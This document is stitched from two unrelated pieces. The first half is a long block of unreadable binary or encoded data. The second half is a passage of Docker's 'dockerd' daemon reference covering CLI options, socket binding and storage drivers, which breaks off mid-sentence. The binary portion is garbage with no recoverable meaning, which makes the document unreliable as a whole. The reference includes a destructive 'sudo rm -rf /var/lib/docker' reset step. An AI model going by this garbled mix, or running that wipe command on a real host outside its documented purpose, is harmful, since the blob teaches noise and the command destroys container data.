z1hvwEkbyi2VkjwB?6=cA&lNXsSbtc;ioD_NCi#^yc(R@s} z<1L6f#f4C2kT5qU9^+VS*wbx;dVYf)vGsF=Fqx^hV;Dx0*kBZ%2pPi0VUmPHfI@X^ zApK;^D}L#&t9Gn$ZjlyQGgSbg7?y~(b=s!{4{~cX2wk}?Pv!cF?bCS~&VOfN<%R@X z1J9^xPN&2Fp0Dsa;Anyo%zGFL16+CY<%$EvUrX-y&FhlDTeHWwe+9|{`WUi}Y)PLFHumC@s~Z%ITNeaq3Y1vFQe5;1H#mj-(mTI@uU z_dJvP_G&rbAv#T%V^ZK;S><&;TEd)9Y()y`+GX|$qUnor2c)Hd+Q&o`Tk`1%Pa@(* zJ1B@z;L=Es=0D+l%KNp+tTrePYhEI-v6kRWkG|_YhtT{rD4es=i(xE1 z&jFeSK0;D@TT_oFOroQW3k(>q!JzHMrqe|_Nc*0TxP_l&f@4}p(S^Wuv??mX^O z3EPQX{P6E5dE@V5ir~5D!aJYtX(Sa3{rUe@d63lKP07C-R(6k?7H)v!c_M+CNjS z9ZdBKPh}N~{z*%%daDX-q*m}KO#x{$foZm)33*pxyZ`6fdvVD;#V9?|9=4;y^whLV zvuPJ4(vuFQrxhVG)(}~9>6hnXI5Vt22Enpnfv{bOWL)O8xQND7aM2)KG%$(&E3i@` zbKN$Ro08d3loeZ>89SA!O$@gNvK|+})h7aHJF>>cGL?Z-d^LMW%o9!&$A)k48`7nQ z8F)$}kXD4~>^Kz;8zL#0fvKSUlataCS;02hNZ;&DTj2hj+6$C*{7!j7(qa zbmb|g^Tpetz3c_&Pn^}s6@3Sa6V8Y-a%CJ`=MEh69+NE@hTN61=lzZwFd{OhXn3?ONV{;+K-;FwU-x5X`g|WPDrmGKPqmJzoJ(l z>Rx~sgAWl3ye0GA98e1Mvf#)Zx(l?2hx|O+eUY|D+m0hNd9O-+xf(uyly~at=YYc3 zqTYB$;rt97=5Q3-qDtd+yZ2q@L`>1;`-P2FMSre{Uiw{dS+v+F2*`J^wPQj?4Z0go z5BDD^8T8*Np3^C*yYFLrwWOr0ME|u%s3;_p7|!uF7GL+ck%8|h*6x(dEo?9CD~2#} z#cHjGuDuIMAIpn~6}w^;B*hNs2PvMJ;8O$^)&xjWmr$Fzfw9Ln#o%h$C@OJ44g zhbjzm5o!_A-h~L~8DKV`q8+FNaFvJbDmTI_jeHSzu+V+pD2+N%|Mbe6I0oLGVG+wX z=qIa|=UVYg1kJ8M1)K1+c z!@A$bc)GF%5L{74O}=oi?skj$yKh30;irNgs7fwDp>2C5GUc>etX!!+wQO%r2g^K9O$Yrpy9Z`Yc~%5O0m+QI_C%+s^-;;q`!37LLP8@jzSw(cuArt-i_3XLjq z8l`2x8Qq%EvD_@@m3KyctKb#SC~G>OMQd$cn7F-(Oly*Gj+R!3i2~sXtPDtGF@=gx zddvr-Vy#W?I|6#kDYy5ZX1F0=WH#~nUiBT7nnCe#szIXP9+BTPhBkJbRNsne4kODL zf)q<3PkEFvMZlbLFc(l-$H?v{<*c_E=3o@>VMU{AFhkM2h9FuXGxfJ4egvz=wGYX| zhrLEob)ZVC+2?u6X+Px4{1k^y? zc9L5=Zn!OvVR4!dKt%2fR_yo;GS;ZPLkjI4+k)rL;!m2!MH%rO59d|Bhjb;0mu;Av zlg+oNHK~{!&ky|l-_7emB{eafR4r=qhA>H6M45yb(cU@Lm@jmo3Q58lNwXsq^E;hY z&P93R2mQJpN9bphPzt`tyIFUqG2T9d`>%U@VM&;R6~R#OZZalk>=d@ZhA5R=dYg|= zy-R9Q+h*JN=ywyDPhV8N`656r^E*pI&b3HSjxyl|E(;_3&qnFxl)Rju^k*xWb6ndz zlOD(=u~_2xZ4|1wYQ9w1i7D5)-D@eV#pi_Vn?UmX(cw8KG_(&nnV58)Hqg*=tSDT( zM0?lcX{NJ??{DvbJd)(qTw%l?R83s*K56U2nWCdi`AZyOA5*P}BIdfO*cs3+wKi<~ z-G-89G*TrfCnTRr#x6A~9FeZmAIy||K4d(&Bg6YpH?~v0_mryGLtKj0sAvdE&rR8} zR}N)K6r7edT@YE;9!sO(4u%Mm|Dd#q=+k&r=OqojFEGnjM*oYEM|JQQ%P`KI|A+jp z8^MEuK1j1LLl)i0*#k+HSBV-NOKT%UyWw4W_i5)=MXKFwWY)tTgSUNwB%kpt`gj(T zbEZ5HajH}HCA7LpxK=9_2`SQ?#v$CUkaNnX6NMTd;}sO^8oc}!}|JHVW%*? z6uMr~4b-0}*eCp45L?oj4ZgwK7VZ-?LEO@OIOcXmV3j;&Gzi1w`k7)D-(Hkqg7%dI zDp_Gu*KUkvQKfXxYp?r0$-*EChsJh4ao7|2gqwv8G1ECcIIYo#a%BJ(hlF30$%{c; zvUITuE3C6+n1(N62HPd_TKT2lm=o4Xk=-jwlg<;?yUHA^wlbMHJQnjr;7B81jCzd&5s+Ztufthp;YM#* ziSStyi6}0bFlgR#kRZGRiym*EEVUA`vg#RzP7F?W<{s*2Srjg-ZZSy8gCrej?$-wV zqP@ZT(0rkKZt^bv>(1>5gw0>;c6%Hi6|yG1|2eey1m;*|-?=y3zw{#Z#@>amCkBu3 z*-?O#0mAtsNOLhnYw5_@8M{=fs8_45^~Nb?uBj-XV){g*;e>!4tLUn&c*u%v?#8v4 zryXJs?GuwLxLFIj;SQXRgI1%(H|K@V?R_=ti!|FPf5OM*5nv;+e^AZZzAQmVo6J@O zZLF<{xwZBH=~a2~av{rlTk;7eBnT6VybI6tczEB^Q|w(48pzw9$IW+Vc%OKo)9LV< zCmuJm=&!dDY)QnOvcPxg&8&=%ECY&v> zzG*9BL3AiMwAh)wMgZQ~jlmq$wP^~rGfhi3iIS|)RwKWg;eDUg3f2fj)%_D|_=NiR z+tUOUbi7^S&&jn8tq;oN4;N!TY)j7HzeA%l)h2v7^T`KF|3b*Rnl&8T@8g;mmXY3Yryg#Ma+nl@cK0YqsjITP!52 zP1$o?PnhpE3zp8odo48C?^yXM#y zHf?LUW2=4a(%TNxTa{4jWz{=!TX!#qxUC|3&P3%uM(lcfifOQ&j*HkGxXl+EVf27c zly$n9J5)pbcdzEL`GLO!9pIvC*j=NDB z>iQ!4KQ&~@%WvNozWczbA!B~r{8pF$eTUOS*8FvQ^Y1?hB@=X+LZosFtNw{Su7j3R4(nTairqR=l3arvA1e_FCYp(^c1$RhuisI9mww7+%p!5=OC|+5#AH| zx(B&#{Kl?MGPKVdn3~)<`MAtgS@mYOzWlRezCE6Q71KV-VC5GkHv>A_X8M!TzJLr) z4ViiJp1hmAx2do1ap@gHpX>g<56_Sm+zH=>!a{705(ZNNM;;=>n_CYH%DZ>wgl&p9iqEXi}r1QO4S1|1wsmXXgJ z3Mb42CdC*;1WMZw)y9Uj^$k0+Hmq9zH!+fH(V%}PYYy2r34mVywDx3oz{(Kb) z*eeGdcAg7^xY5@CrL;Zyrr?mH@zJY3G4GD&OO#Qpk`Er|0b=)MiY8y;RNxFEl|~3} z%c7p0d|MtjMxY_%f4qBJsg%tG5u>Lu@PQ9qg-V_d93~CcRa+XV&G!ucj~$`$U42>1 zd&0GS4*?L6Q1pEw?5q_I?_f!H-X{r~ZP16~j7PSDn@E^&SlGF@v%y6V*}@d46g#!v zIUF7A%!HJEjogP&Y|J@)prxk@5MV-fY=BG{7!$7BcH3T5=%|%~2nyv6u*~ z6SH(e*aR$rCf5oj4IhyKv2k=7+B~R_ zgN@J8X*)dFg@ZDXbS-^2)4S9P0qCTi{dL^Jp7pVn`hJoJW z;JOh;+eX)7Onwc9FsZ)*>s^SbRg_#Z!xFi%_~(S1v=ICVz>`IGqNd~};vOK6_RI){ zl4*{TzTCKE(vng;$7)JRE`+L3fz%-fUJ}>J?HO)U`|Co@0P^P+i1MT)@3;&C0AH;Q z#*)L$bg~nijcI&8tf-iVGqmhxyzqYp_B96Unf)tW%-V9KK`RCFc@rmADcOJspvuBQr|M2M~bM6z|#u zrS$?pbr%DH?vWXYJ0MFTnQEp?toF(YgEo_i#ko#g+CPj&Kb0iAMotlFHA2wHtH%G6FAvm=Yp#oJrik0S)t}|2hUX5s4P6oi_ za4r=lzE1DK)BzKYV4+AJMZZVDT2sUvTK02QNEG1$f)F|#s-)_K(-YF5YX2Gv<{;nO-4Sic?+zN-B@dt{@$a>jMG( z?~=J{pYryGEE(BkO!Tm<+?iBpEbG=T)*MI){=+H6} zg`-;N`y(I~prqjC$nm`eWaVu2)WnbLwW^1c95Q~C8kruiKMH`3B<9^1vun{GjjyMf zfV@07fIpZu_Cytd#aA>UkwF%!rzajCbqnhd23zKxBoB&m z9c~G>jl%6ZMY~tpxD%=_XtG2Xz}>NF-kn~+I^x&|^tsq`c-~VkQO%MM3LB3*d=K$d z{v`=SehRf2odANTjYOCCd{rsoIQx#=m^QPw7Lf9=5K|oD(ZIbI4k5mG3p|X;@A!r< zVV|_rs+tkd9l`n$5ejuBhADB;*Let;5b4>&Tw-MX7_XnQ3=tU7p~ZzY(9AmSPP$Ov zki-E1vqs?(Z^?)4PXz(M^tgP{a_g18b-FAt-mV7lhi!n8PMOc2js2*7_-=hS5_o=8 zKuh&k3`$-Fhja}~gtGHtc>FOp_pk4?2Tq*0IOQplK@zUeOUIIwEB|qKGKC50=#?~# zEE$X6DZxPeoocT^IiqnKm&`k$wD3^Bh(NCqAW=4rOjf0Gs{n~+(>}05k#?{q`H+PD z1Ei3O06g-+1rSMaQ$-R>J+%NV8}l~hW&C61?@5BVXKq?WFHf2lf3wRF=i&XuM0HGF z*R1rjmf=Z((s@(3Ly#y5qOiz@XS%YH<8-NMau>HR;1|l|>CdEEyfsJmh;zv5U!Az3 zmc)!rj=cd#6cnwb^M&$4w_OflDY-nY$I93tD^hPgZ0H|5_0G z{hz&8i39S*qgx=7TKJO-yr5F_N>l>Jo^Y3AZasPUu~v(D$xgfTO`ar54FGn3fgji) zjWGyyC{Az4JV{SeXC(R(~Vhs_%tDqDtW0!St&KNyqGKd|AOADz}%Er??K3UYs3idT{1GdmRe9!(vY6cTrF%NB(q zdes1OfAO6Acw&Q?9+qe(i@{r}AaknqbA}MxBqZOmrUK6n5MY^>6qd##1mE;bN#4M7 zWAITDc+S@Yq^14&NqU@720+eephHitr8c~!oi55u_?BA3se`gdnJ$BSZ_B+OhVb-V z+!RHPu;7d7vA67H`VoKw64$f5;;S5C_Z^oHPf6Ug_EYA=jbq_jf^I*z}>#m3PO;vmK<3JsonZ{%tI_Tr}R$ow`!LSYc7VyHl~7NpV0)I1&}aZ0w% z5c%_K+^ry_Z#?obG6g0oiIOu_ypp01W~N}^Xa|&~al!%K!h^*Hsm26v0?LjEe0hs> zWrNZbV;()E8nciVc2!V0!vXKD5a)gue0`wPp#Q7=>8hA&z9p%b%m{4e4Q@C7H z3DqjRV_e_BKP#5J1OW@bt1~e*Wz&HrZ9wl`g8MVV=^u{#2?W!Yn##7iQJdQ9L>SA` z)NmAc($d6IDxDILxD12|B}io>O5Vn8fF~f_hF}jMRJ0H$3a*_E_B_yNMO<}J*7wy1 zb^>%A3043?fgEV6B`aY=Frn0Byt#HR_z3;ErIjO}F-1#}Tor}CpzL13*&zsG$}n$i zq!^&Q7QkrN40+@EUjG2da#3YKn06qq8eFS|yQL28{tm)KJL{j$;kyrbJayrsduv#8 za>Nc?bUPxahpGjk^PM9?fhDzoTW_0sGF_e=zNu4irh|geiHJ*BLKsv7^#>a>$>3-z z;j#|FNI`e)wqwijqaR0r6Hg)dFub;M>k8CzO$07-b`OPUQ)@vc!5_bRVQV`Iapr?> zJANH-jlUBRwT}=p;rQBwU_?1s`@P$SyEEUi$JMj5_)Citk@1PET|AZ0w(WeS=h!iMD$Mby%7)2t6CnZK?p)5H8&5dXb3DFwC-7YA?WQJp&l^V!(`I>(-5u{c z7gKwR@)`!B4);ws@H!H7DDaz!&ePrmC0zVHhPC9h{nMIC>D;||h5>_@IkU}a1O!Ut z56dv40cw*j`?N%=!`(aG*@p?cF;?nC2g%+ekRy0vq!VuzTJ90*0zf&d9FiZ{#l4Rc zr8XsU9tU_I%hpN@R(huNEEtNP8FXnGY>ytkd5{3N)Q)e!=5%Pl3b-*KxpvLj6^E%;xUG=2X)_@@ew!RB2iA1{}jMi!I7Qr0|PO;OaM7ykxg_$7`0HAvo8DLn4aqQ1?__Hx zylC6PsT*_h4`N3^_hH!;zu3(*4P}N#y~8OzBBIvzvH|Of9tMH;S68O0OH)CeBRbE0 zftY(N)H@BlI={j+lYmY-I@63A)U(r4*Q3nX-&FU_05o}JUx#Zs=*Y4+^NLcv)^Na64ihOvvsJXPbQO>u#>($)eSKpjp{y6`t zr~K8H`uv}luVVhb0%WHlbM`YIHh0A+hoGJ5Ve>b42>fGzl3Eh#uNOJGq?xcJQBf+@ zzjR=JN%qqvoa}P2(X!%&1f>hh%&W_)&HieO%TwQ%wVFM2%wJD=yf)As1fPF0YW6v=01Z%R#$F%HI4emuKNw zNBbAY&G!0FvQ7PDs^V9-oE1mG>5vPH{?F&aE7)9LGNJ|8g4OBqvJRZ|QQX(vH1nOc z9T*-_=)I7mb~Qw>!cD(VPkvgL!~uThAEmVm=Ffec6aba(f7Ic`*10}S=D^O@pS1Dj z|FS=I9^Gd%`AHTFz7pV=Dzd+62=P^){WbaC|H<0+CyXMcbDV}yVShgN6w+j#)x||M zH(4%tS}I#xDln~ju35@^5RkXdnj~))=^*w{Esb!Ssgb}-qYddqV77Ee&7Kj;v8Zgq z`{jtB`-6Rk!7gLDLw*4P0r@dMtICcB$ec%g)j3As4Dc`JALAv~m>iQK{LxpU7pvaF z3RagrfI#gDx6(@#nMLN6~XAFw?bM2Eg)LI>B#CvQ5F@c zXXP~!1@+>^`jq1OlY&z^#Z$uEwzlu1liC8lr!1ny(xO@w7wKl?)vut|m${^PH7WS_0u z3J5|@gM@{KhlKz

hX^kC2g)la!T~mzbHFo1C4VpP-?lqok##r91$LtE>yEgg*cx zMgR*+PD2C&MuQqiPD=nShd>7aD1*Vsg*wIn8iytT1h=k*u_A;k001zAAKin}BZkGt zgDWP3v=prFhl;22^Yr!h_xSnx`~01$?*N@Zcr_>%iW>mb4VsbA$%-4vgsm!&AmTDZ zMqJ@I)B->afdrix95jT%3jz(DSR-T%5ye3TE{K?UfI&cj@%ri9|H-qb&!0epq6&HQ zkcN;rJnoRV4nT&IHKNJ@@Sz4TLm~oLTqPuBAtdLH7E1cjNr8_@7y$Soa6ln&g0N~; z0svysn>mH*-OIPH-@kwx{kw|@1%M%h7!INJA<>5&1tLcVAfUiTLoF6;ojB~!0EmVW zFFfpI>5`@;oPYpu)rsNOgfas=M;Pa#z_@ek-p#xBqrtTc(egHEgk~oc4iFj=&Jfc> z5ELp~r6hppLOTZB8cxXgppLB>K;Qxb8S*FJZTaP>V#bSO{&-ylr=AOHXm zlyK1x7XVNI45z&yfB+w$P+%_r3?RY?0TL4AkVWEXx6hEPhglJThMEbX zo0e+osi?*`pQx<1>MEe5rYh^Kw4S=^tGMQ>>u#~u>g%t-x^wHU#1?C8PrU}K?6S2E zd+f8&Mr%s4%vNhHpUz6F?Y7)jLhZHSh8s|}-Ii;v|F++XtM0mlkbCaC@amc_yYzzV zZoK&B`{}&y2%*Ad4%OHputTWuB`ZtZkeYx71Ej+U09$*nz7$uiBfqOG*qlnoIS9e8 zMu@QSDlm@bbcJ*wZq^2wZB3VLc3{-vpo0@Lpg`#kD4>v( z)J8~M(lslfz+ypp1AM~@-Yn6=3S9q?H;cn50fXCxDDi>`HDvws434YNS`AWry&Mc9 zaG1d}FI=Sq&WSpK#Nsm`w!@Y$*tN>bXU8u4|2@4bag+uch%f*(;(V}#5d)?CLI4Ol zp@Is8n4pf(g30t8rq zTM-i1rV~aKFw7D#08qjXw|p=I5E&SNAe69x(`djvKybhSWF#!5&F+B^yoV0}P&!0F zX%Gm3NK#JYg#1Yj0>xv1Xll?NCuG1TFc1I-nF9?ImT&g9Xz9gQ+!8Pj-bU#S~3(sV}%WCI1DZ=CzD4+(2&}NCnh~{5FA*G3kl&y z`INGTd4#1ySaTlqxo!ji*juJHh652q4w2!Yi|Y!3O950UlI~#0C6~#}OhkZ<7W5%4 zh5>*Nm2nVf90UaR2E;??q7b23AOg({s6Zj%0{Fd7ni5F>01S1_P&z>g#dCr}uVbDnmFWWT(||!+Inl(( zQkFH4P%msr2nw81p5Z700O+J4|6mfwWbQFSg&@$Ley(BwE*Pjz1=@s_t|Ay5_!;sT zl7T@OMg)n2{Kp^_*qCv4B zjuHmIA`rCD3FOIRS0J#29e{5MOQ1_*fB+*I(Z~rUxQuL^AhID0A)bXWUlVr9SZ0!d ziiB8#$Ov!)BUEVtY*9e~fVcuNu_&7qAYUO;NEw!vrT`?jS!d`LYW%JimFlPG>BaXVe$)KLwM12 z`NiuhN+19xnD@Y0qyYd9#wQAZpk5Fr%u;B8;0i}@0|T%WVM@@T1aK(AAZEo72CxAO zn|O9lXg~opTomSV;FTecF-Z#0fG3>z#%F6n0|>xi8T*(|c5T37aZKc`LU9N zV;BtBxX4gunhON*+9g{#AT=OsPNU4_r6pkl=QDw5uS{mRn!o@6*gz7x%;u#X;RI-& zh5-&h=Q`W@&UntVp7+e>KKuF4fDW{s4S*5=7~lkyY_p=hoP!v+fCZ3_w4^6Z=}KGr z(wNS)rZ>&$PD|PaCNaptnioy#Qk(kJs7|%2SIz2HyZY6zj - -# daemon - -```markdown -Usage: dockerd [OPTIONS] - -A self-sufficient runtime for containers. - -Options: - --add-runtime value Register an additional OCI compatible runtime (default []) - --api-cors-header string Set CORS headers in the Engine API - --authorization-plugin value Authorization plugins to load (default []) - --bip string Specify network bridge IP - -b, --bridge string Attach containers to a network bridge - --cgroup-parent string Set parent cgroup for all containers - --cluster-advertise string Address or interface name to advertise - --cluster-store string URL of the distributed storage backend - --cluster-store-opt value Set cluster store options (default map[]) - --config-file string Daemon configuration file (default "/etc/docker/daemon.json") - --containerd string Path to containerd socket - -D, --debug Enable debug mode - --default-gateway value Container default gateway IPv4 address - --default-gateway-v6 value Container default gateway IPv6 address - --default-runtime string Default OCI runtime for containers (default "runc") - --default-ulimit value Default ulimits for containers (default []) - --disable-legacy-registry Disable contacting legacy registries - --dns value DNS server to use (default []) - --dns-opt value DNS options to use (default []) - --dns-search value DNS search domains to use (default []) - --exec-opt value Runtime execution options (default []) - --exec-root string Root directory for execution state files (default "/var/run/docker") - --experimental Enable experimental features - --fixed-cidr string IPv4 subnet for fixed IPs - --fixed-cidr-v6 string IPv6 subnet for fixed IPs - -g, --graph string Root of the Docker runtime (default "/var/lib/docker") - -G, --group string Group for the unix socket (default "docker") - --help Print usage - -H, --host value Daemon socket(s) to connect to (default []) - --icc Enable inter-container communication (default true) - --init Run an init in the container to forward signals and reap processes - --init-path string Path to the docker-init binary - --insecure-registry value Enable insecure registry communication (default []) - --ip value Default IP when binding container ports (default 0.0.0.0) - --ip-forward Enable net.ipv4.ip_forward (default true) - --ip-masq Enable IP masquerading (default true) - --iptables Enable addition of iptables rules (default true) - --ipv6 Enable IPv6 networking - --label value Set key=value labels to the daemon (default []) - --live-restore Enable live restore of docker when containers are still running (Linux only) - --log-driver string Default driver for container logs (default "json-file") - -l, --log-level string Set the logging level ("debug", "info", "warn", "error", "fatal") (default "info") - --log-opt value Default log driver options for containers (default map[]) - --max-concurrent-downloads int Set the max concurrent downloads for each pull (default 3) - --max-concurrent-uploads int Set the max concurrent uploads for each push (default 5) - --metrics-addr string Set address and port to serve the metrics api (default "") - --mtu int Set the containers network MTU - --oom-score-adjust int Set the oom_score_adj for the daemon (default -500) - -p, --pidfile string Path to use for daemon PID file (default "/var/run/docker.pid") - --raw-logs Full timestamps without ANSI coloring - --registry-mirror value Preferred Docker registry mirror (default []) - --seccomp-profile value Path to seccomp profile - --selinux-enabled Enable selinux support - --shutdown-timeout=15 Set the shutdown timeout value in seconds - -s, --storage-driver string Storage driver to use - --storage-opt value Storage driver options (default []) - --swarm-default-advertise-addr string Set default address or interface for swarm advertised address - --tls Use TLS; implied by --tlsverify - --tlscacert string Trust certs signed only by this CA (default "/root/.docker/ca.pem") - --tlscert string Path to TLS certificate file (default "/root/.docker/cert.pem") - --tlskey string Path to TLS key file (default "/root/.docker/key.pem") - --tlsverify Use TLS and verify the remote - --userland-proxy Use userland proxy for loopback traffic (default true) - --userland-proxy-path string Path to the userland proxy binary - --userns-remap string User/Group setting for user namespaces - -v, --version Print version information and quit -``` - -Options with [] may be specified multiple times. - -dockerd is the persistent process that manages containers. Docker -uses different binaries for the daemon and client. To run the daemon you -type `dockerd`. - -To run the daemon with debug output, use `dockerd -D`. - -## Daemon socket option - -The Docker daemon can listen for [Docker Engine API](../api/) -requests via three different types of Socket: `unix`, `tcp`, and `fd`. - -By default, a `unix` domain socket (or IPC socket) is created at -`/var/run/docker.sock`, requiring either `root` permission, or `docker` group -membership. - -If you need to access the Docker daemon remotely, you need to enable the `tcp` -Socket. Beware that the default setup provides un-encrypted and -un-authenticated direct access to the Docker daemon - and should be secured -either using the [built in HTTPS encrypted socket](https://docs.docker.com/engine/security/https/), or by -putting a secure web proxy in front of it. You can listen on port `2375` on all -network interfaces with `-H tcp://0.0.0.0:2375`, or on a particular network -interface using its IP address: `-H tcp://192.168.59.103:2375`. It is -conventional to use port `2375` for un-encrypted, and port `2376` for encrypted -communication with the daemon. - -> **Note:** -> If you're using an HTTPS encrypted socket, keep in mind that only -> TLS1.0 and greater are supported. Protocols SSLv3 and under are not -> supported anymore for security reasons. - -On Systemd based systems, you can communicate with the daemon via -[Systemd socket activation](http://0pointer.de/blog/projects/socket-activation.html), -use `dockerd -H fd://`. Using `fd://` will work perfectly for most setups but -you can also specify individual sockets: `dockerd -H fd://3`. If the -specified socket activated files aren't found, then Docker will exit. You can -find examples of using Systemd socket activation with Docker and Systemd in the -[Docker source tree](https://github.com/docker/docker/tree/master/contrib/init/systemd/). - -You can configure the Docker daemon to listen to multiple sockets at the same -time using multiple `-H` options: - -```bash -# listen using the default unix socket, and on 2 specific IP addresses on this host. -$ sudo dockerd -H unix:///var/run/docker.sock -H tcp://192.168.59.106 -H tcp://10.10.10.2 -``` - -The Docker client will honor the `DOCKER_HOST` environment variable to set the -`-H` flag for the client. - -```bash -$ docker -H tcp://0.0.0.0:2375 ps -# or -$ export DOCKER_HOST="tcp://0.0.0.0:2375" -$ docker ps -# both are equal -``` - -Setting the `DOCKER_TLS_VERIFY` environment variable to any value other than -the empty string is equivalent to setting the `--tlsverify` flag. The following -are equivalent: - -```bash -$ docker --tlsverify ps -# or -$ export DOCKER_TLS_VERIFY=1 -$ docker ps -``` - -The Docker client will honor the `HTTP_PROXY`, `HTTPS_PROXY`, and `NO_PROXY` -environment variables (or the lowercase versions thereof). `HTTPS_PROXY` takes -precedence over `HTTP_PROXY`. - -### Bind Docker to another host/port or a Unix socket - -> **Warning**: -> Changing the default `docker` daemon binding to a -> TCP port or Unix *docker* user group will increase your security risks -> by allowing non-root users to gain *root* access on the host. Make sure -> you control access to `docker`. If you are binding -> to a TCP port, anyone with access to that port has full Docker access; -> so it is not advisable on an open network. - -With `-H` it is possible to make the Docker daemon to listen on a -specific IP and port. By default, it will listen on -`unix:///var/run/docker.sock` to allow only local connections by the -*root* user. You *could* set it to `0.0.0.0:2375` or a specific host IP -to give access to everybody, but that is **not recommended** because -then it is trivial for someone to gain root access to the host where the -daemon is running. - -Similarly, the Docker client can use `-H` to connect to a custom port. -The Docker client will default to connecting to `unix:///var/run/docker.sock` -on Linux, and `tcp://127.0.0.1:2376` on Windows. - -`-H` accepts host and port assignment in the following format: - - tcp://[host]:[port][path] or unix://path - -For example: - -- `tcp://` -> TCP connection to `127.0.0.1` on either port `2376` when TLS encryption - is on, or port `2375` when communication is in plain text. -- `tcp://host:2375` -> TCP connection on - host:2375 -- `tcp://host:2375/path` -> TCP connection on - host:2375 and prepend path to all requests -- `unix://path/to/socket` -> Unix socket located - at `path/to/socket` - -`-H`, when empty, will default to the same value as -when no `-H` was passed in. - -`-H` also accepts short form for TCP bindings: `host:` or `host:port` or `:port` - -Run Docker in daemon mode: - -```bash -$ sudo /dockerd -H 0.0.0.0:5555 & -``` - -Download an `ubuntu` image: - -```bash -$ docker -H :5555 pull ubuntu -``` - -You can use multiple `-H`, for example, if you want to listen on both -TCP and a Unix socket - -```bash -# Run docker in daemon mode -$ sudo /dockerd -H tcp://127.0.0.1:2375 -H unix:///var/run/docker.sock & -# Download an ubuntu image, use default Unix socket -$ docker pull ubuntu -# OR use the TCP port -$ docker -H tcp://127.0.0.1:2375 pull ubuntu -``` - -### Daemon storage-driver option - -The Docker daemon has support for several different image layer storage -drivers: `aufs`, `devicemapper`, `btrfs`, `zfs`, `overlay` and `overlay2`. - -The `aufs` driver is the oldest, but is based on a Linux kernel patch-set that -is unlikely to be merged into the main kernel. These are also known to cause -some serious kernel crashes. However, `aufs` allows containers to share -executable and shared library memory, so is a useful choice when running -thousands of containers with the same program or libraries. - -The `devicemapper` driver uses thin provisioning and Copy on Write (CoW) -snapshots. For each devicemapper graph location – typically -`/var/lib/docker/devicemapper` – a thin pool is created based on two block -devices, one for data and one for metadata. By default, these block devices -are created automatically by using loopback mounts of automatically created -sparse files. Refer to [Storage driver options](#storage-driver-options) below -for a way how to customize this setup. -[~jpetazzo/Resizing Docker containers with the Device Mapper plugin](http://jpetazzo.github.io/2014/01/29/docker-device-mapper-resize/) -article explains how to tune your existing setup without the use of options. - -The `btrfs` driver is very fast for `docker build` - but like `devicemapper` -does not share executable memory between devices. Use -`dockerd -s btrfs -g /mnt/btrfs_partition`. - -The `zfs` driver is probably not as fast as `btrfs` but has a longer track record -on stability. Thanks to `Single Copy ARC` shared blocks between clones will be -cached only once. Use `dockerd -s zfs`. To select a different zfs filesystem -set `zfs.fsname` option as described in [Storage driver options](#storage-driver-options). - -The `overlay` is a very fast union filesystem. It is now merged in the main -Linux kernel as of [3.18.0](https://lkml.org/lkml/2014/10/26/137). `overlay` -also supports page cache sharing, this means multiple containers accessing -the same file can share a single page cache entry (or entries), it makes -`overlay` as efficient with memory as `aufs` driver. Call -`dockerd -s overlay` to use it. - -> **Note:** -> As promising as `overlay` is, the feature is still quite young and should not -> be used in production. Most notably, using `overlay` can cause excessive -> inode consumption (especially as the number of images grows), as well as -> being incompatible with the use of RPMs. - -The `overlay2` uses the same fast union filesystem but takes advantage of -[additional features](https://lkml.org/lkml/2015/2/11/106) added in Linux -kernel 4.0 to avoid excessive inode consumption. Call `dockerd -s overlay2` -to use it. - -> **Note:** -> Both `overlay` and `overlay2` are currently unsupported on `btrfs` or any -> Copy on Write filesystem and should only be used over `ext4` partitions. - -### Storage driver options - -Particular storage-driver can be configured with options specified with -`--storage-opt` flags. Options for `devicemapper` are prefixed with `dm`, -options for `zfs` start with `zfs` and options for `btrfs` start with `btrfs`. - -#### Devicemapper options - -* `dm.thinpooldev` - - Specifies a custom block storage device to use for the thin pool. - - If using a block device for device mapper storage, it is best to use `lvm` - to create and manage the thin-pool volume. This volume is then handed to Docker - to exclusively create snapshot volumes needed for images and containers. - - Managing the thin-pool outside of Engine makes for the most feature-rich - method of having Docker utilize device mapper thin provisioning as the - backing storage for Docker containers. The highlights of the lvm-based - thin-pool management feature include: automatic or interactive thin-pool - resize support, dynamically changing thin-pool features, automatic thinp - metadata checking when lvm activates the thin-pool, etc. - - As a fallback if no thin pool is provided, loopback files are - created. Loopback is very slow, but can be used without any - pre-configuration of storage. It is strongly recommended that you do - not use loopback in production. Ensure your Engine daemon has a - `--storage-opt dm.thinpooldev` argument provided. - - Example use: - - ```bash - $ sudo dockerd --storage-opt dm.thinpooldev=/dev/mapper/thin-pool - ``` - -* `dm.basesize` - - Specifies the size to use when creating the base device, which limits the - size of images and containers. The default value is 10G. Note, thin devices - are inherently "sparse", so a 10G device which is mostly empty doesn't use - 10 GB of space on the pool. However, the filesystem will use more space for - the empty case the larger the device is. - - The base device size can be increased at daemon restart which will allow - all future images and containers (based on those new images) to be of the - new base device size. - - Example use: - - ```bash - $ sudo dockerd --storage-opt dm.basesize=50G - ``` - - This will increase the base device size to 50G. The Docker daemon will throw an - error if existing base device size is larger than 50G. A user can use - this option to expand the base device size however shrinking is not permitted. - - This value affects the system-wide "base" empty filesystem - that may already be initialized and inherited by pulled images. Typically, - a change to this value requires additional steps to take effect: - - ```bash - $ sudo service docker stop - $ sudo rm -rf /var/lib/docker - $ sudo service docker start - ``` - - Example use: - - ```bash - $ sudo dockerd --storage-opt dm.basesize=20G - ``` - -* `dm.loopdatasize` - - > **Note**: - > This option configures devicemapper loopback, which should not - > be used in production. - - Specifies the size to use when creating the loopback file for the - "data" device which is used for the thin pool. The default size is - 100G. The file is sparse, so it will not initially take up this - much space. - - Example use: - - ```bash - $ sudo dockerd --storage-opt dm.loopdatasize=200G - ``` - -* `dm.loopmetadatasize` - - > **Note**: - > This option configures devicemapper loopback, which should not - > be used in production. - - Specifies the size to use when creating the loopback file for the - "metadata" device which is used for the thin pool. The default size - is 2G. The file is sparse, so it will not initially take up - this much space. - - Example use: - - ```bash - $ sudo dockerd --storage-opt dm.loopmetadatasize=4G - ``` - -* `dm.fs` - - Specifies the filesystem type to use for the base device. The supported - options are "ext4" and "xfs". The default is "xfs" - - Example use: - - ```bash - $ sudo dockerd --storage-opt dm.fs=ext4 - ``` - -* `dm.mkfsarg` - - Specifies extra mkfs arguments to be used when creating the base device. - - Example use: - - ```bash - $ sudo dockerd --storage-opt "dm.mkfsarg=-O ^has_journal" - ``` - -* `dm.mountopt` - - Specifies extra mount options used when mounting the thin devices. - - Example use: - - ```bash - $ sudo dockerd --storage-opt dm.mountopt=nodiscard - ``` - -* `dm.datadev` - - (Deprecated, use `dm.thinpooldev`) - - Specifies a custom blockdevice to use for data for the thin pool. - - If using a block device for device mapper storage, ideally both 